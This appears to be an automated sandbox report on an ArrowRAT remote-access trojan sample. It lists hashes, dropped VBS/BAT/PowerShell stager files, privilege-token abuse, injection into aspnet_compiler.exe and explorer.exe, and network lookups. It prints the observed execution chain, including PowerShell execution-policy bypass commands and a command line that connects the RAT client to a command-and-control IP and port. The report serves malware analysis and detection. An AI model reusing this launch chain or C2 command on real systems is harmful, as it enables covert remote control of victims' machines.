Malware Analysis Report

2024-10-10 10:15

Sample ID 230519-btk2kaed68
Target 5ff1aded34d5d6f0635f6f9861436886.bin
SHA256 5295a4068b1de47c3385bd1608f84ef51b4bb8b6e0f867af7797a199da9378dc
Tags
arrowrat client rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5295a4068b1de47c3385bd1608f84ef51b4bb8b6e0f867af7797a199da9378dc

Threat Level: Known bad

The file 5ff1aded34d5d6f0635f6f9861436886.bin was found to be: Known bad.

Malicious Activity Summary

arrowrat client rat

ArrowRat

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-19 01:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-19 01:26

Reported

2023-05-19 01:28

Platform

win7-20230220-en

Max time kernel

31s

Max time network

34s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd.ps1

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Unlimited\ISO\Binnot.vbs"

C:\Windows\System32\cmd.exe

cmd /c ""C:\ProgramData\Unlimited\ISO\Binnot.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Binnot.ps1

Network

N/A

Files

memory/2040-58-0x000000001B290000-0x000000001B572000-memory.dmp

memory/2040-59-0x00000000022E0000-0x00000000022E8000-memory.dmp

memory/2040-60-0x00000000028F0000-0x0000000002970000-memory.dmp

memory/2040-61-0x00000000028F0000-0x0000000002970000-memory.dmp

memory/2040-62-0x00000000028F0000-0x0000000002970000-memory.dmp

memory/2040-69-0x00000000028F0000-0x0000000002970000-memory.dmp

C:\ProgramData\Unlimited\ISO\Binnot.vbs

MD5 8444901b66d6f83f3a684f1b44646868
SHA1 69c9c40aef3734959b4ce5f07005bf13c07646f9
SHA256 cfeaafc87ceec9986f37f6a42ecfa39260f98c951404df95da5e074141add5da
SHA512 7493b0d40c9c914c8968b42752b1d14d415e7bccff07f9bf2ab976d77517e12a456f142ee786527c4e536fab3e4156b21ce353f51f5925bbc405937ad7929bbb

C:\ProgramData\Unlimited\ISO\Binnot.bat

MD5 f1d747a7825a5db756d428a5254d244e
SHA1 7db56fe57492bd856c787cd2a836eff4f2ce5e01
SHA256 5863b76caee43b2f1efdd2322f2e5731b1537d1deeb35e860cd75a8304fe4ddf
SHA512 4b1f63df96b8f9e2a381855974b2efab5bd48ae342b1e29a51661d0514ba6f8e62d23e3e58a9a9f978d39880ab03a9b9bf72ab52a546a965da20daa18c4d246d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 bc56171e5c5e1d408145ec3fc8b3cdc4
SHA1 f22979ca4218867b13c697eecd267991949a0d9d
SHA256 7e835320659002c243a14aa35f98b9b244d6191ec4d1fe05dd75834bf396656b
SHA512 280b322b3a09bc7ed01288c962b180d8436d21eb41d1d8f10f36a2442564b82225b568a9bbf4ba6d84ef8c2b5587230a90004f3ae085708abff195e96691f61b

memory/1328-79-0x000000001B1D0000-0x000000001B4B2000-memory.dmp

memory/1328-80-0x0000000001EC0000-0x0000000001EC8000-memory.dmp

C:\ProgramData\Unlimited\ISO\Binnot.ps1

MD5 58ef18971b1520648e0c6d67036251ff
SHA1 68bd1ee657ff233f6a1ee453914aaecdeb845284
SHA256 226b14799e579e28954937fa3ffdb7d0e5dcd10360b35c329a7246a23be4b4b3
SHA512 9b7f04aca4b3e2af5aafdc9ea30c1722722d668078bea8b0aaa2394d0cb50ac75716fb9173d4084bd5a9cfaa279bd94404b64c140532daa5b3bdd66842f332d2

memory/1328-82-0x0000000002754000-0x0000000002757000-memory.dmp

memory/1328-83-0x000000000275B000-0x0000000002792000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-19 01:26

Reported

2023-05-19 01:28

Platform

win10v2004-20230220-en

Max time kernel

150s

Max time network

154s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd.ps1

Signatures

ArrowRat

rat arrowrat

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1675742406-747946869-1029867430-1000\{B05CD583-21C4-4B88-AD2A-A7B36E5F950D} C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3780 wrote to memory of 100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 3780 wrote to memory of 100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 100 wrote to memory of 3832 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 100 wrote to memory of 3832 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3832 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3832 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3848 wrote to memory of 4568 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3848 wrote to memory of 4568 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4568 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4568 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1732 wrote to memory of 3244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 1732 wrote to memory of 3244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 1732 wrote to memory of 3244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 1732 wrote to memory of 3244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 1732 wrote to memory of 3244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 1732 wrote to memory of 3244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 1732 wrote to memory of 3244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 1732 wrote to memory of 3244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 3244 wrote to memory of 3184 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\explorer.exe
PID 3244 wrote to memory of 3184 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\explorer.exe
PID 3244 wrote to memory of 1620 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3244 wrote to memory of 1620 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3244 wrote to memory of 1620 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3244 wrote to memory of 1620 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3244 wrote to memory of 1620 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3244 wrote to memory of 1620 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3244 wrote to memory of 1620 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3244 wrote to memory of 1620 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd.ps1

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Unlimited\ISO\Binnot.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Binnot.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Binnot.ps1

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\ProgramData\Unlimited\ISO\Unlimited.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Unlimited.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Unlimited.ps1

C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 185.252.178.121 1337 qCDAaGyIF

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 1.202.248.87.in-addr.arpa udp
US 8.8.8.8:53 84.150.43.20.in-addr.arpa udp
US 8.8.8.8:53 14.103.197.20.in-addr.arpa udp
US 8.8.8.8:53 113.66.64.40.in-addr.arpa udp
US 8.8.8.8:53 250.255.255.239.in-addr.arpa udp
IE 13.69.239.73:443 tcp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 240.232.229.192.in-addr.arpa udp
US 8.8.8.8:53 126.143.241.8.in-addr.arpa udp
US 8.8.8.8:53 240.232.18.117.in-addr.arpa udp
US 8.8.8.8:53 32.134.221.88.in-addr.arpa udp
NL 8.238.20.126:80 tcp
NL 8.238.20.126:80 tcp
NL 8.238.20.126:80 tcp
US 8.8.8.8:53 254.166.241.8.in-addr.arpa udp
US 8.8.8.8:53 42.134.221.88.in-addr.arpa udp
NL 173.223.113.164:443 tcp
US 8.8.8.8:53 9.143.101.95.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kl0dbiph.qjs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3780-133-0x000001FC31060000-0x000001FC31082000-memory.dmp

memory/3780-143-0x000001FC49500000-0x000001FC49510000-memory.dmp

memory/3780-144-0x000001FC49500000-0x000001FC49510000-memory.dmp

C:\ProgramData\Unlimited\ISO\Binnot.vbs

MD5 8444901b66d6f83f3a684f1b44646868
SHA1 69c9c40aef3734959b4ce5f07005bf13c07646f9
SHA256 cfeaafc87ceec9986f37f6a42ecfa39260f98c951404df95da5e074141add5da
SHA512 7493b0d40c9c914c8968b42752b1d14d415e7bccff07f9bf2ab976d77517e12a456f142ee786527c4e536fab3e4156b21ce353f51f5925bbc405937ad7929bbb

C:\ProgramData\Unlimited\ISO\Binnot.bat

MD5 f1d747a7825a5db756d428a5254d244e
SHA1 7db56fe57492bd856c787cd2a836eff4f2ce5e01
SHA256 5863b76caee43b2f1efdd2322f2e5731b1537d1deeb35e860cd75a8304fe4ddf
SHA512 4b1f63df96b8f9e2a381855974b2efab5bd48ae342b1e29a51661d0514ba6f8e62d23e3e58a9a9f978d39880ab03a9b9bf72ab52a546a965da20daa18c4d246d

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 223bd4ae02766ddc32e6145fd1a29301
SHA1 900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA256 1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512 648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

memory/4584-158-0x0000014FDB660000-0x0000014FDB670000-memory.dmp

memory/4584-159-0x0000014FDB660000-0x0000014FDB670000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 27fdb1beb89b56345e585d480be3026b
SHA1 2626e41ca27668518d01c04e1579f77027ff31a1
SHA256 ef8cd66cc241c6d899919ae6f8369334b20202bd4ad49acfa546d29300c533d2
SHA512 bd8208c8763ad8a6c25b6363b8e0e2a3c694e4e0cabfe4ce5d40945bd1f4274b7da976997f825e95c4455bf6b2e20b5bd960609b172f7c70d3521cb2ab24d49a

C:\ProgramData\Unlimited\ISO\Binnot.ps1

MD5 58ef18971b1520648e0c6d67036251ff
SHA1 68bd1ee657ff233f6a1ee453914aaecdeb845284
SHA256 226b14799e579e28954937fa3ffdb7d0e5dcd10360b35c329a7246a23be4b4b3
SHA512 9b7f04aca4b3e2af5aafdc9ea30c1722722d668078bea8b0aaa2394d0cb50ac75716fb9173d4084bd5a9cfaa279bd94404b64c140532daa5b3bdd66842f332d2

memory/4584-171-0x0000014FDB660000-0x0000014FDB670000-memory.dmp

memory/4584-172-0x0000014FDB660000-0x0000014FDB670000-memory.dmp

C:\ProgramData\Unlimited\ISO\Unlimited.vbs

MD5 c281573a4f6f6ac5b06f2e9436400093
SHA1 c2699e56b7c26ac9cdfe1f500b49151b69bd6ad8
SHA256 3c312f2547fbc4a3ffe5c1b6d91c03494d7653fd758d886473f2ae6656de11f7
SHA512 76aed1be4b48d2fc019c9136eb74b3a96b56b89c74cb3b3347f8eefc592fee24a2a94ea3babd4b394080c7663864781c89afe761e59f8d65aed147d1ed422026

C:\ProgramData\Unlimited\ISO\Unlimited.bat

MD5 eff64d56c40c54a1f9891d7a6ad54899
SHA1 dbaf9a4aeb8484690d6118155d59158598f0799a
SHA256 c846b192c5dc974c6d63024a06d4c31b2f7c8baa61af133e5b00009b68df86e2
SHA512 c89f82c7807b947e10f82740c01d5cb996e95c4a6e79375eee6b981d0ed911d31537e964d0cefef874c7e12f9f4baf237f0f9ed44de866abd3c8030a25b7cc83

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2cacea4e19ddf5755e70346cc1cbe27b
SHA1 d4f7c2950f951857da18cfec490370152983e121
SHA256 5488c6f47e2e55addf07b920f0ce43ed970515193c4cb1ffb845a9b441bcd9ad
SHA512 445497cefd12a10e19272b51028a6b19d039b578a2e4d1f4c7f4c4bed447c55b1cd23453e9bed9307aaeb7b57ea8c721d1884eaaafa422df4607cfe3a75f54f7

memory/1732-186-0x000002B7CC7C0000-0x000002B7CC7D0000-memory.dmp

memory/1732-187-0x000002B7CC7C0000-0x000002B7CC7D0000-memory.dmp

memory/1732-188-0x000002B7CC7C0000-0x000002B7CC7D0000-memory.dmp

C:\ProgramData\Unlimited\ISO\Unlimited.ps1

MD5 e1bb0ce912e111d3b891de922e21a739
SHA1 8ae8856cb82f3340b2b2b1a06b3123b549005549
SHA256 5f79c8a3a6ff96ae8ccf96dfc486ae1f5e8edeabb663e6f90be89aeb727457cc
SHA512 bbb85cb9160a52d1bf464b7b459caaf9f808407031c423790be65e820fc8cce39c99c6096110228e8a8b33ddf5bff75350cbda2f6b01fc500f5169a4142528bf

memory/3244-190-0x0000000000400000-0x000000000042C000-memory.dmp

memory/3244-192-0x0000000005460000-0x0000000005A04000-memory.dmp

memory/3244-193-0x0000000004F50000-0x0000000004FEC000-memory.dmp

memory/1620-194-0x0000000000400000-0x0000000000418000-memory.dmp